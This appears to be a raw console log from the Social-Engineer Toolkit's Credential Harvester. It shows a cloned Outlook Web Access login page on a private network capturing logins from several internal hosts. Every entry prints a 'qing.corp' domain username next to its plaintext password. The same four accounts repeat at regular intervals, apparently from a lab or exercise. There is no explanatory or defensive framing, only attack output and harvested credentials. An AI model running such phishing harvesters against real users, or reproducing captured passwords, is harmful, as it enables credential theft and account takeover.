*] Cloning the website: https://192.168.80.163/owa/auth/logon.aspx?replaceCurrent=1&url=                                                       
[*] This could take a little bit...                                                                                                             

The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.        
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80                                                                                                  
[*] Information will be displayed to you as it arrives below:                                                                                   
192.168.65.35 - - [20/Apr/2022 14:43:21] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: destination=                                                                                                                             
PARAM: flags=4                                                                                                                                  
PARAM: forcedownlevel=0                                                                                                                         
POSSIBLE USERNAME FIELD FOUND: username=qing.corp\daniel.b                                                                                      
POSSIBLE PASSWORD FIELD FOUND: password=Tu38YJXDC(stbHDaVmZqvFPV27C*4%Nm                                                                        
POSSIBLE PASSWORD FIELD FOUND: passwordText=                                                                                                    
PARAM: isUtf8=1                                                                                                                                 
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.                                                                                   
                                                                                                                                                
                                                                                                                                                
192.168.65.35 - - [20/Apr/2022 14:43:21] "POST /auth.owa HTTP/1.1" 302 -
192.168.65.14 - - [20/Apr/2022 14:43:22] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: destination=                                                                                                                             
PARAM: flags=4                                                                                                                                  
PARAM: forcedownlevel=0                                                                                                                         
POSSIBLE USERNAME FIELD FOUND: username=qing.corp\marvin.t                                                                                      
POSSIBLE PASSWORD FIELD FOUND: password=b*lrl2_+0thwXTb3^Ym78D*X*uU*k^St                                                                        
POSSIBLE PASSWORD FIELD FOUND: passwordText=                                                                                                    
PARAM: isUtf8=1                                                                                                                                 
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.                                                                                   
                                                                                                                                                
                                                                                                                                                
192.168.65.14 - - [20/Apr/2022 14:43:22] "POST /auth.owa HTTP/1.1" 302 -
192.168.65.177 - - [20/Apr/2022 14:43:23] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: destination=                                                                                                                             
PARAM: flags=4                                                                                                                                  
PARAM: forcedownlevel=0                                                                                                                         
POSSIBLE USERNAME FIELD FOUND: username=qing.corp\tara.c                                                                                        
POSSIBLE PASSWORD FIELD FOUND: password=(+exrPSrS0V1oPVt%C^x9mXgt4wc!wi3                                                                        
POSSIBLE PASSWORD FIELD FOUND: passwordText=                                                                                                    
PARAM: isUtf8=1                                                                                                                                 
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.                                                                                   
                                                                                                                                                
                                                                                                                                                
192.168.65.177 - - [20/Apr/2022 14:43:24] "POST /auth.owa HTTP/1.1" 302 -
192.168.65.44 - - [20/Apr/2022 14:43:25] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: destination=                                                                                                                             
PARAM: flags=4                                                                                                                                  
PARAM: forcedownlevel=0                                                                                                                         
POSSIBLE USERNAME FIELD FOUND: username=qing.corp\debbie.m                                                                                      
POSSIBLE PASSWORD FIELD FOUND: password=Bw8j@$Bu%(rVGGse0ZZLoruE*(jU#IF5                                                                        
POSSIBLE PASSWORD FIELD FOUND: passwordText=                                                                                                    
PARAM: isUtf8=1                                                                                                                                 
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.                                                                                   
                                                                                                                                                
                                                                                                                                                
192.168.65.44 - - [20/Apr/2022 14:43:26] "POST /auth.owa HTTP/1.1" 302 -
192.168.65.35 - - [20/Apr/2022 14:43:58] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:                                                                                                               
PARAM: destination=                                                                                                                                  
PARAM: flags=4                                                                                                                                       
PARAM: forcedownlevel=0                                                                                                                                  
POSSIBLE USERNAME FIELD FOUND: username=qing.corp\daniel.b                                                                                               
POSSIBLE PASSWORD FIELD FOUND: password=Tu38YJXDC(stbHDaVmZqvFPV27C*4%Nm                                                                                   
POSSIBLE PASSWORD FIELD FOUND: passwordText=                                                                                                               
PARAM: isUtf8=1                                                                                                                                              
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.                                                                                                    
                                                                                                                                                                 
                                                                                                                                                                      
192.168.65.35 - - [20/Apr/2022 14:43:59] "POST /auth.owa HTTP/1.1" 302 -                                                                                                   
192.168.65.14 - - [20/Apr/2022 14:43:59] "GET / HTTP/1.1" 200 -                                                                                                               
[*] WE GOT A HIT! Printing the output:                                                                                                                                         
PARAM: destination=                                                                                                                                                              
PARAM: flags=4                                                                                                                                                                    
PARAM: forcedownlevel=0                                                                                                                                                           
POSSIBLE USERNAME FIELD FOUND: username=qing.corp\marvin.t                                                                                                                        
POSSIBLE PASSWORD FIELD FOUND: password=b*lrl2_+0thwXTb3^Ym78D*X*uU*k^St                                                                                                          
POSSIBLE PASSWORD FIELD FOUND: passwordText=                                                                                                                                      
PARAM: isUtf8=1                                                                                                                                                                   
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.                                                                                                                     
                                                                                                                                                                                  
                                                                                                                                                                                  
192.168.65.14 - - [20/Apr/2022 14:44:00] "POST /auth.owa HTTP/1.1" 302 -
192.168.65.177 - - [20/Apr/2022 14:44:01] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: destination=                                                                                                                                                               
PARAM: flags=4                                                                                                                                                                    
PARAM: forcedownlevel=0                                                                                                                                                           
POSSIBLE USERNAME FIELD FOUND: username=qing.corp\tara.c                                                                                                                          
POSSIBLE PASSWORD FIELD FOUND: password=(+exrPSrS0V1oPVt%C^x9mXgt4wc!wi3                                                                                                          
POSSIBLE PASSWORD FIELD FOUND: passwordText=                                                                                                                                      
PARAM: isUtf8=1                                                                                                                                                                   
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.                                                                                                                     
                                                                                                                                                                                  
                                                                                                                                                                                  
192.168.65.177 - - [20/Apr/2022 14:44:01] "POST /auth.owa HTTP/1.1" 302 -
192.168.65.44 - - [20/Apr/2022 14:44:03] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: destination=                                                                                                                                                               
PARAM: flags=4                                                                                                                                                                    
PARAM: forcedownlevel=0                                                                                                                                                           
POSSIBLE USERNAME FIELD FOUND: username=qing.corp\debbie.m                                                                                                                        
POSSIBLE PASSWORD FIELD FOUND: password=Bw8j@$Bu%(rVGGse0ZZLoruE*(jU#IF5                                                                                                          
POSSIBLE PASSWORD FIELD FOUND: passwordText=                                                                                                                                      
PARAM: isUtf8=1                                                                                                                                                                   
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.                                                                                                                     
                                                                                                                                                                                  
                                                                                                                                                                                  
192.168.65.44 - - [20/Apr/2022 14:44:03] "POST /auth.owa HTTP/1.1" 302 -
192.168.65.35 - - [20/Apr/2022 14:44:36] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: destination=                                                                                                                                                               
PARAM: flags=4                                                                                                                                                                    
PARAM: forcedownlevel=0                                                                                                                                                           
POSSIBLE USERNAME FIELD FOUND: username=qing.corp\daniel.b                                                                                                                        
POSSIBLE PASSWORD FIELD FOUND: password=Tu38YJXDC(stbHDaVmZqvFPV27C*4%Nm                                                                                                          
POSSIBLE PASSWORD FIELD FOUND: passwordText=                                                                                                                                      
PARAM: isUtf8=1                                                                                                                                                                   
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.                                                                                                                     
                                                                                                                                                                                  
                                                                                                                                                                                  
192.168.65.35 - - [20/Apr/2022 14:44:36] "POST /auth.owa HTTP/1.1" 302 -
192.168.65.14 - - [20/Apr/2022 14:44:37] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: destination=                                                                                                                                                               
PARAM: flags=4                                                                                                                                                                    
PARAM: forcedownlevel=0                                                                                                                                                           
POSSIBLE USERNAME FIELD FOUND: username=qing.corp\marvin.t                                                                                                                        
POSSIBLE PASSWORD FIELD FOUND: password=b*lrl2_+0thwXTb3^Ym78D*X*uU*k^St                                                                                                          
POSSIBLE PASSWORD FIELD FOUND: passwordText=                                                                                                                                      
PARAM: isUtf8=1                                                                                                                                                                   
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.                                                                                                                     
                                                                                                                                                                                  
                                                                                                                                                                                  
192.168.65.14 - - [20/Apr/2022 14:44:37] "POST /auth.owa HTTP/1.1" 302 -
192.168.65.177 - - [20/Apr/2022 14:44:38] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: destination=                                                                                                                                                               
PARAM: flags=4                                                                                                                                                                    
PARAM: forcedownlevel=0                                                                                                                                                           
POSSIBLE USERNAME FIELD FOUND: username=qing.corp\tara.c                                                                                                                          
POSSIBLE PASSWORD FIELD FOUND: password=(+exrPSrS0V1oPVt%C^x9mXgt4wc!wi3                                                                                                          
POSSIBLE PASSWORD FIELD FOUND: passwordText=                                                                                                                                      
PARAM: isUtf8=1                                                                                                                                                                   
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.                                                                                                                     
                                                                                                                                                                                  
                                                                                                                                                                                  
192.168.65.177 - - [20/Apr/2022 14:44:38] "POST /auth.owa HTTP/1.1" 302 -
192.168.65.44 - - [20/Apr/2022 14:44:40] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: destination=                                                                                                                                                               
PARAM: flags=4                                                                                                                                                                    
PARAM: forcedownlevel=0                                                                                                                                                           
POSSIBLE USERNAME FIELD FOUND: username=qing.corp\debbie.m                                                                                                                        
POSSIBLE PASSWORD FIELD FOUND: password=Bw8j@$Bu%(rVGGse0ZZLoruE*(jU#IF5                                                                                                          
POSSIBLE PASSWORD FIELD FOUND: passwordText=                                                                                                                                      
PARAM: isUtf8=1                                                                                                                                                                   
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.                                                                                                                     
                                                                                                                                                                                  
                                                                                                                                                                                  
192.168.65.44 - - [20/Apr/2022 14:44:41] "POST /auth.owa HTTP/1.1" 302 -
192.168.65.35 - - [20/Apr/2022 14:45:13] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: destination=                                                                                                                                                               
PARAM: flags=4                                                                                                                                                                    
PARAM: forcedownlevel=0                                                                                                                                                           
POSSIBLE USERNAME FIELD FOUND: username=qing.corp\daniel.b                                                                                                                        
POSSIBLE PASSWORD FIELD FOUND: password=Tu38YJXDC(stbHDaVmZqvFPV27C*4%Nm                                                                                                          
POSSIBLE PASSWORD FIELD FOUND: passwordText=                                                                                                                                      
PARAM: isUtf8=1                                                                                                                                                                   
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.                                                                                                                     
                                                                                                                                                                                  
                                                                                                                                                                                  
192.168.65.35 - - [20/Apr/2022 14:45:14] "POST /auth.owa HTTP/1.1" 302 -
192.168.65.14 - - [20/Apr/2022 14:45:14] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: destination=                                                                                                                                                               
PARAM: flags=4                                                                                                                                                                    
PARAM: forcedownlevel=0                                                                                                                                                           
POSSIBLE USERNAME FIELD FOUND: username=qing.corp\marvin.t                                                                                                                        
POSSIBLE PASSWORD FIELD FOUND: password=b*lrl2_+0thwXTb3^Ym78D*X*uU*k^St                                                                                                          
POSSIBLE PASSWORD FIELD FOUND: passwordText=                                                                                                                                      
PARAM: isUtf8=1                                                                                                                                                                   
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.                                                                                                                     
                                                                                                                                                                                  
                                                                                                                                                                                  
192.168.65.14 - - [20/Apr/2022 14:45:15] "POST /auth.owa HTTP/1.1" 302 -
192.168.65.177 - - [20/Apr/2022 14:45:15] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: destination=                                                                                                                                                               
PARAM: flags=4                                                                                                                                                                    
PARAM: forcedownlevel=0                                                                                                                                                           
POSSIBLE USERNAME FIELD FOUND: username=qing.corp\tara.c                                                                                                                          
POSSIBLE PASSWORD FIELD FOUND: password=(+exrPSrS0V1oPVt%C^x9mXgt4wc!wi3                                                                                                          
POSSIBLE PASSWORD FIELD FOUND: passwordText=                                                                                                                                      
PARAM: isUtf8=1                                                                                                                                                                   
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.                                                                                                                     
                                                                                                                                                                                  
                                                                                                                                                                                  
192.168.65.177 - - [20/Apr/2022 14:45:16] "POST /auth.owa HTTP/1.1" 302 -
192.168.65.44 - - [20/Apr/2022 14:45:17] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: destination=                                                                                                                                                               
PARAM: flags=4                                                                                                                                                                    
PARAM: forcedownlevel=0                                                                                                                                                           
POSSIBLE USERNAME FIELD FOUND: username=qing.corp\debbie.m                                                                                                                        
POSSIBLE PASSWORD FIELD FOUND: password=Bw8j@$Bu%(rVGGse0ZZLoruE*(jU#IF5                                                                                                          
POSSIBLE PASSWORD FIELD FOUND: passwordText=                                                                                                                                      
PARAM: isUtf8=1                                                                                                                                                                   
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.                                                                                                                     
                                                                                                                                                                                  
                                                                                                                                                                                  
192.168.65.44 - - [20/Apr/2022 14:45:18] "POST /auth.owa HTTP/1.1" 302 -

